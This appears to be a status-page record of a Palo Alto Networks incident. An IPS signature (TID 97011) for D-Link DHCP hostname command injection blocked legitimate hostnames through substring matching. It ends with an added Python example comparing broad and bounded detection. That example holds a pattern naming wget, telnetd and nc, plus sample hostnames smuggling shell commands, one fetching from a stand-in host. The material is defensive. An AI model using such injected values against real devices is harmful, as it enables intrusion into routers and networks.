Palo Alto Networks incident

Content 9104 Pulled Out

Notice Resolved

Palo Alto Networks experienced a notice incident on May 22, 2026, lasting 20h. The incident has been resolved; the full update timeline is below.

Started: May 22, 2026, 01:30 AM UTC
Resolved: May 22, 2026, 09:30 PM UTC
Duration: 20h
Detected by Pingoru: May 22, 2026, 01:30 AM UTC

Update timeline

  1. resolved May 23, 2026, 01:05 AM UTC

    Issue Description

    On May 21, 2026, customers reported their traffic being blocked due to TID 97011: “D-Link Router DHCP Hostname Command Injection Vulnerability”. The TID was designed to block OS command injection attempts within the hostname fields of DHCP requests. However, the signature included a broad command-matching filter that led to false positives across customer environments, as it incorrectly triggered on legitimate hostnames containing overlapping character strings.

    Findings and Technical Analysis

    The D-Link Router DHCP Hostname Command Injection Vulnerability (TID 97011) is an OS command injection flaw that allows command execution attempts through the DHCP Hostname fields. The signature's coverage relates to CVE-2025-69542 and CVE-2025-14659, which target D-Link devices such as the DIR-895LA1 and DIR-860LB1, respectively.

    Previous Detection Logic

    The initial detection logic for TID 97011 included a command-filtering string within DHCP hostname fields that lacked strict boundary delimiters.

    Root Cause

    The false positive (FP) occurred because the signature's command-validation logic triggered against legitimate hostnames containing the targeted command string as a substring. This broad matching behavior resulted in unintended traffic disruptions for multiple customers.

    Proposed Solutions & Mitigation

    We improved the signature logic to make it more resilient against false positives. The updated signature has been released with content 9105-10068.
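The root cause above, substring matching without boundary delimiters, can be reproduced with a small comparison. This is an added example, not Palo Alto Networks' signature: the command tokens, the regular expression and the sample hostnames are all constructed for illustration, since the page does not publish the actual TID 97011 pattern.

```python
import re

# Constructed command tokens (assumption): the real signature's list is not on the page.
COMMANDS = ("ping", "wget", "telnetd", "nc")

def broad_match(hostname: str) -> bool:
    """Pre-fix style: fire when a command token appears anywhere in the hostname."""
    h = hostname.lower()
    return any(cmd in h for cmd in COMMANDS)

# Bounded style: a token only counts when a shell metacharacter introduces it
# and it is not followed by another hostname character.
_BOUNDED = re.compile(
    r"(?:[;|&`\n]|\$\()\s*(?:%s)(?![\w-])" % "|".join(map(re.escape, COMMANDS)),
    re.IGNORECASE,
)

def bounded_match(hostname: str) -> bool:
    return _BOUNDED.search(hostname) is not None

# Constructed DHCP option 12 (hostname) values: (hostname, is_injection_attempt)
SAMPLES = [
    ("shipping-desk-01", False),        # contains "ping"
    ("finance-laptop", False),          # contains "nc"
    ("hr-printer-02", False),           # no token at all
    ("cam;ping -c1 192.0.2.1", True),
    ("a`telnetd`", True),
    ("x$(wget http://192.0.2.1/)", True),
]

def false_positives(matcher):
    """Legitimate hostnames the matcher would block."""
    return [h for h, bad in SAMPLES if matcher(h) and not bad]

def missed(matcher):
    """Injection attempts the matcher would let through."""
    return [h for h, bad in SAMPLES if bad and not matcher(h)]

if __name__ == "__main__":
    for name, m in (("broad", broad_match), ("bounded", bounded_match)):
        print(name, "FP:", false_positives(m), "missed:", missed(m))
```

Running a candidate signature against a corpus of real hostnames from DHCP logs in this way, before promoting it to a blocking action, is the check that would surface this class of false positive.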